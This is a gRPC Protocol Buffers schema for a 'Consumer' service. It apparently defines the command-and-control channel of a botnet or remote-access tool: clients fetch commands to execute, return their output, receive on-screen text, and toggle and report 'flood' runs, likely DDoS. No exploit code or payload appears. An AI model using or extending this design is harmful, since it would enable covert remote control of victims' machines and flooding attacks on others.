ClientData.proto

syntax = "proto3";

package pb;

option go_package="./pb";


message ClientOnScreenData {
    bool ShouldUpdate = 1;
    string OnScreenText = 2;
}

message ClientExecData {
    bool ShouldExec = 1;
    string Command = 2;
}

message ClientExecOutput {
    ClientDataRequest id = 1;
    bytes output = 2;
}

message Void {}

message FloodData { bool ShouldFlood = 1;}
message FloodOutput { string output = 1; }

message ClientDataRequest { string client_id = 1; }

message ClientDataOnScreenTextResponse { ClientOnScreenData on_screen = 1; }


service Consumer {
    rpc SubscribeOnScreenText(ClientDataRequest) returns (stream ClientDataOnScreenTextResponse);
    rpc GetCommand(ClientDataRequest) returns (ClientExecData);
    rpc SetCommandOutput(ClientExecOutput) returns (Void);
    rpc GetFlood(ClientDataRequest) returns (FloodData);
    rpc SetFloodOutput(stream FloodOutput) returns (Void);
}